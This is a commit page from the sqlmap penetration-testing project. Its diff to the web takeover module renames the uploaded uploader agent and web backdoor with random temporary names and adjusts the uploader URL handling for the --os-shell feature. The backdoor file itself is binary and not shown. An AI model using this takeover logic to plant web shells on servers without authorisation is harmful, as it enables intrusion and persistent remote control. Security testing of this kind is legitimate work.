sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-06-29 17:33:11 +03:00
Code Issues Packages Projects Releases Wiki Activity

new changes regarding --os-shell

Browse Source
This commit is contained in:
Miroslav Stampar 2010-02-25 10:33:41 +00:00
parent 858cb25975
commit 2cafd5697b
2 changed files with 8 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
lib/takeover/web.py
View File

@ -36,6 +36,7 @@ from lib.core.common import ntToPosixSlashes
from lib.core.common import isWindowsPath from lib.core.common import isWindowsPath
from lib.core.common import normalizePath from lib.core.common import normalizePath
from lib.core.common import posixToNtSlashes from lib.core.common import posixToNtSlashes
from lib.core.common import randomStr
from lib.core.common import readInput from lib.core.common import readInput
from lib.core.convert import hexencode from lib.core.convert import hexencode
from lib.core.data import conf from lib.core.data import conf
@ -166,12 +167,12 @@ class Web:
elif int(choice) < 1 or int(choice) > 3: elif int(choice) < 1 or int(choice) > 3:
logger.warn("invalid value, it must be 1 or 3") logger.warn("invalid value, it must be 1 or 3")
backdoorName = "backdoor.%s" % self.webApi backdoorName = "tmpb%s.%s" % (randomStr(4), self.webApi)
backdoorStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, backdoorName + '_'), backdoorName) backdoorStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi), backdoorName)
backdoorContent = backdoorStream.read() backdoorContent = backdoorStream.read()
uploaderName = "uploader.%s" % self.webApi uploaderName = "tmpu%s.%s" % (randomStr(4), self.webApi)
uploaderContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, uploaderName + '_')) uploaderContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "uploader.%s_" % self.webApi))
for directory in directories: for directory in directories:
# Upload the uploader agent # Upload the uploader agent
@ -181,8 +182,9 @@ class Web:
if isWindowsPath(requestDir): if isWindowsPath(requestDir):
requestDir = requestDir[2:] requestDir = requestDir[2:]
requestDir = normalizePath(requestDir) requestDir = normalizePath(requestDir)
self.webBaseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, requestDir) self.webBaseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, requestDir)
self.webUploaderUrl = "%s/%s" % (self.webBaseUrl, uploaderName) self.webUploaderUrl = "%s/%s" % (self.webBaseUrl.rstrip('/'), uploaderName)
self.webUploaderUrl = ntToPosixSlashes(self.webUploaderUrl.replace("./", "/")) self.webUploaderUrl = ntToPosixSlashes(self.webUploaderUrl.replace("./", "/"))
uplPage, _ = Request.getPage(url=self.webUploaderUrl, direct=True, raise404=False) uplPage, _ = Request.getPage(url=self.webUploaderUrl, direct=True, raise404=False)
@ -194,7 +196,7 @@ class Web:
continue continue
infoMsg = "the uploader agent has been successfully uploaded " infoMsg = "the uploader agent has been successfully uploaded "
infoMsg += "on '%s'" % directory infoMsg += "on '%s' ('%s')" % (directory, self.webUploaderUrl)
logger.info(infoMsg) logger.info(infoMsg)
if self.webApi == "asp": if self.webApi == "asp":

BIN
shell/backdoor.asp_
View File

Binary file not shown.